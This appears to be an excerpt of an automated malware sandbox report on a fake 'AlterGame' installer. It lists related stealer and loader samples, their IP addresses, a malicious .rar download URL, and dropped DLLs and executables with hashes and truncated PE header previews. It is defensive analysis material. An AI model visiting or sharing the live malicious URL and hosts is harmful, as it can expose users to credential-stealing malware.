 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar | Browse | 185.156.72.65
 | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, Vidar | Browse | 185.156.72.65
 | p0w4g3KGU3.exe | Get hash | malicious | SmokeLoader | Browse | 185.156.72.78
 | pdf.js | Get hash | malicious | SmokeLoader | Browse | 185.156.72.78
 | 09.09.2024p.pdf.js | Get hash | malicious | SmokeLoader | Browse | 185.156.72.78
 | https://expertpromotions.ru/ukr-net/google/drive/file/832946456397563875683478498385685634984983469239/%D0%9F%D0%BB%D0%B0%D1%82%D0%B5%D0%B6%D0%BD%D0%BE%D0%B5_%D0%BF%D0%BE%D1%80%D1%83%D1%87%D0%B5%D0%BD%D0%B8%D0%B5_%D0%B2_i%D0%BD%D0%BE%D0%B7%D0%B5%D0%BD%D0%BE%D0%B9_%D0%B2%D0%B0%D0%BB%D1%8E%D1%82%D0%B5.rar | Get hash | malicious | Unknown | Browse | 185.156.72.78
 | svc.exe | Get hash | malicious | SmokeLoader | Browse | 185.156.72.78
 | 2000 EUR.doc | Get hash | malicious | SmokeLoader | Browse | 185.156.72.78
                                            No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\ProgramData\EShineEncoder\sqlite3.dll | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse |
 | file.exe | Get hash | malicious | Socks5Systemz | Browse |
 | file.exe | Get hash | malicious | Socks5Systemz | Browse |
 | OXrZ6fj4Hq.exe | Get hash | malicious | Neshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWorm | Browse |
 | IrAr85Qv7X.exe | Get hash | malicious | Mars Stealer, Vidar | Browse |
 | 8BQ2v9glrG.exe | Get hash | malicious | Mars Stealer, Vidar | Browse |
 | BBiIn5gqhd.exe | Get hash | malicious | Mars Stealer, Vidar | Browse |
 | gacut_837143941.exe | Get hash | malicious | Unknown | Browse |
 | WTsvUl9X8N.exe | Get hash | malicious | Oski Stealer, Vidar | Browse |
 | PmX1jHdUnS.exe | Get hash | malicious | Oski Stealer, Vidar | Browse |
                                                                Process:C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4255772
                                                                Entropy (8bit):6.21828901245533
                                                                Encrypted:false
                                                                SSDEEP:49152:rVe7nTYqtRIsJOMDeP3qnfEFqb+O8EC56FLSY9xAVYyyilII:JQROSGqEEC5sWCyaPilv
                                                                MD5:C1DEEF6663EFF952E8990193B3452A2F
                                                                SHA1:A091D2760CF44430E4B5DF078037D6F909463A9D
                                                                SHA-256:232A78BB3A68FDDB2E746BE40125944BBD7AA1B119188520A2ABB0841F5BD027
                                                                SHA-512:84E41F84C48A217D40CC12ADDF8B56B9E2D09A65FC24CCA3CE59EAA2B5D50031059C93D9CC8D480C5F2CA9C967BE64C44080D8A874BD853D060BA5CCD6E9538E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L....n.L............................L.............@..........................PA.....B.A.....................................l............_.........................................................................................................._qrsa_4............................. ..`_qrsb_4..*.......,..................@..@_qrsc_4..c...@...0...(..............@....rsrc....`.......`...X..............@..@_qrsd_4..:...."..8....!.............`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):645592
                                                                Entropy (8bit):6.50414583238337
                                                                Encrypted:false
                                                                SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: OXrZ6fj4Hq.exe, Detection: malicious, Browse
                                                                • Filename: IrAr85Qv7X.exe, Detection: malicious, Browse
                                                                • Filename: 8BQ2v9glrG.exe, Detection: malicious, Browse
                                                                • Filename: BBiIn5gqhd.exe, Detection: malicious, Browse
                                                                • Filename: gacut_837143941.exe, Detection: malicious, Browse
                                                                • Filename: WTsvUl9X8N.exe, Detection: malicious, Browse
                                                                • Filename: PmX1jHdUnS.exe, Detection: malicious, Browse
                                                                Reputation:high, very likely benign file
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                Process:C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):8
                                                                Entropy (8bit):2.0
                                                                Encrypted:false
                                                                SSDEEP:3:YC/lln:vXn
                                                                MD5:94BDFB9D097CEE9404D361DBC089DAC8
                                                                SHA1:6E0193957EE374472E156774CDDD2ECBBC53D76F
                                                                SHA-256:0FEE2C7FCA72F8D47690D4575BCC3067D678A5053A081E07AF2B766F0AD38802
                                                                SHA-512:04A6E9F7ADFDE696E539CEEA55BFD14FE32EE6646478F427B66F720E8B2A3E9470E58C04CBD192D6803276C0062AD2AB4209D0C135795C8053DCF6088681B652
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:._=g....
                                                                Process:C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):4
                                                                Entropy (8bit):0.8112781244591328
                                                                Encrypted:false
                                                                SSDEEP:3:yln:2n
                                                                MD5:9A30CB647A6BDD7B520EE3A072881D16
                                                                SHA1:5DC0E1CF689CB31A6C529DC8DDB9D677123E97F7
                                                                SHA-256:0AB677189BBD88D8D69ABCEB88946F32A36333B36D4E75CB1AE69EF3C4CF1FC2
                                                                SHA-512:152D87A8A4E15495F498F2BC2D24D07A7F38837D96846DA412BE5C0C44FE4F9BB803C3E7F0ADCCF801DCB392D7113011052E52048337EC1A6ADE15576BAB9DB6
                                                                Malicious:false
                                                                Preview:G...
                                                                Process:C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):128
                                                                Entropy (8bit):2.9545817380615236
                                                                Encrypted:false
                                                                SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                Malicious:false
                                                                Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                                Process:C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):128
                                                                Entropy (8bit):1.7095628900165245
                                                                Encrypted:false
                                                                SSDEEP:3:LDXdQSWBdMUE/:LLdQSGd
                                                                MD5:4FFFD4D2A32CBF8FB78D521B4CC06680
                                                                SHA1:3FA6EFA82F738740179A9388D8046619C7EBDF54
                                                                SHA-256:EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
                                                                SHA-512:130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
                                                                Malicious:false
                                                                Preview:dad6f9fa0c8327344d1aa24f183c3767................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:MS Windows HtmlHelp Data
                                                                Category:dropped
                                                                Size (bytes):78183
                                                                Entropy (8bit):7.692742945771669
                                                                Encrypted:false
                                                                SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                Malicious:false
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):265728
                                                                Entropy (8bit):6.4472652154517345
                                                                Encrypted:false
                                                                SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:modified
                                                                Size (bytes):4255772
                                                                Entropy (8bit):6.21828901245533
                                                                Encrypted:false
                                                                SSDEEP:49152:rVe7nTYqtRIsJOMDeP3qnfEFqb+O8EC56FLSY9xAVYyyilII:JQROSGqEEC5sWCyaPilv
                                                                MD5:C1DEEF6663EFF952E8990193B3452A2F
                                                                SHA1:A091D2760CF44430E4B5DF078037D6F909463A9D
                                                                SHA-256:232A78BB3A68FDDB2E746BE40125944BBD7AA1B119188520A2ABB0841F5BD027
                                                                SHA-512:84E41F84C48A217D40CC12ADDF8B56B9E2D09A65FC24CCA3CE59EAA2B5D50031059C93D9CC8D480C5F2CA9C967BE64C44080D8A874BD853D060BA5CCD6E9538E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):176128
                                                                Entropy (8bit):6.204917493416147
                                                                Encrypted:false
                                                                SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1645320
                                                                Entropy (8bit):6.787752063353702
                                                                Encrypted:false
                                                                SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                MD5:871C903A90C45CA08A9D42803916C3F7
                                                                SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1645320
                                                                Entropy (8bit):6.787752063353702
                                                                Encrypted:false
                                                                SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                MD5:871C903A90C45CA08A9D42803916C3F7
                                                                SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):4255772
                                                                Entropy (8bit):6.21828878301341
                                                                Encrypted:false
                                                                SSDEEP:49152:GVe7nTYqtRIsJOMDeP3qnfEFqb+O8EC56FLSY9xAVYyyilII:cQROSGqEEC5sWCyaPilv
                                                                MD5:B369E8685C117CBD527C775F2BB67A07
                                                                SHA1:D04B1107DD1A49CCD1C73252CBE5C9C789AAE0CE
                                                                SHA-256:081DB5D6609D54BDE700EAB1BA41B2341393E0B73AC87EC31A12B9C514D83F53
                                                                SHA-512:D378E6C2DF4A7BBCC2F80D0B647C02BC1CC6727E226B4C8D0DB9F553D21DEE34E5C62DDA8B07AFD828E6A72BF89D3122C8A11C5D4DAFDA9C9A64C7D670F4BC09
                                                                Malicious:false
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):348160
                                                                Entropy (8bit):6.542655141037356
                                                                Encrypted:false
                                                                SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):645592
                                                                Entropy (8bit):6.50414583238337
                                                                Encrypted:false
                                                                SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):265728
                                                                Entropy (8bit):6.4472652154517345
                                                                Encrypted:false
                                                                SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):499712
                                                                Entropy (8bit):6.414789978441117
                                                                Encrypted:false
                                                                SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:MS Windows HtmlHelp Data
                                                                Category:dropped
                                                                Size (bytes):78183
                                                                Entropy (8bit):7.692742945771669
                                                                Encrypted:false
                                                                SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                Malicious:false
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):176128
                                                                Entropy (8bit):6.204917493416147
                                                                Encrypted:false
                                                                SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):445440
                                                                Entropy (8bit):6.439135831549689
                                                                Encrypted:false
                                                                SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                MD5:CAC7E17311797C5471733638C0DC1F01
                                                                SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):445440
                                                                Entropy (8bit):6.439135831549689
                                                                Encrypted:false
                                                                SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                MD5:CAC7E17311797C5471733638C0DC1F01
                                                                SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):499712
                                                                Entropy (8bit):6.414789978441117
                                                                Encrypted:false
                                                                SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):348160
                                                                Entropy (8bit):6.542655141037356
                                                                Encrypted:false
                                                                SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):645592
                                                                Entropy (8bit):6.50414583238337
                                                                Encrypted:false
                                                                SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):715253
                                                                Entropy (8bit):6.514700613803512
                                                                Encrypted:false
                                                                SSDEEP:12288:r/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyR8h1K8xyFW:bkqZ1G7DMvrP537dzHsA6hcHGbH3EahX
                                                                MD5:AE19918E9A2F183E6DC54F47D905A105
                                                                SHA1:4D0AA8F6F6A9DB774D5E48D80FF76796A5FBCACA
                                                                SHA-256:B916FA0E8B7332FAADCB5E756DD8183555627E57ABCF332A5978ECABD9FBDF03
                                                                SHA-512:D8B1C199FDBC86335437F6353FCA2809AF3B959AC225BFA41BA2C78EFF4C324B38FA7573C8A244DBE03B4434DCED730DA43167E0C1EAA6811D4190AAAE53BC24
                                                                Malicious:true
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:InnoSetup Log AlterGame, version 0x30, 4858 bytes, 082561\user, "C:\Users\user\AppData\Local\AlterGame 1.13"
                                                                Category:dropped
                                                                Size (bytes):4858
                                                                Entropy (8bit):4.71272727773437
                                                                Encrypted:false
                                                                SSDEEP:96:PyWnJ8QpLsCR9n+eOIhIC7ICSss/LnMx99:PyWnJ7pLkHIhvICSsAnU
                                                                MD5:EDCF2B7D055A68652CE182E27E2A35A8
                                                                SHA1:7056AA57AD924B943309420BF734B1A62AA1FDA8
                                                                SHA-256:68159DEBA03FDFACA5255C68E2DD6E9D6FA4C8A703554DB65E1D0412D9E1FC31
                                                                SHA-512:2EC2DDBF5977EC744E0F51873E3D018BF3C9FC6255AE36D74B421B1E874B2005716B638DC7912A97607D9914BE1CC4E6EB3AE9D472B6B395D9B893382E4B1972
                                                                Malicious:false
                                                                Preview:Inno Setup Uninstall Log (b)....................................AlterGame.......................................................................................................................AlterGame.......................................................................................................................0...........%...............................................................................................................8.2.........M.m.......K....082561.user+C:\Users\user\AppData\Local\AlterGame 1.13.................. ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):715253
                                                                Entropy (8bit):6.514700613803512
                                                                Encrypted:false
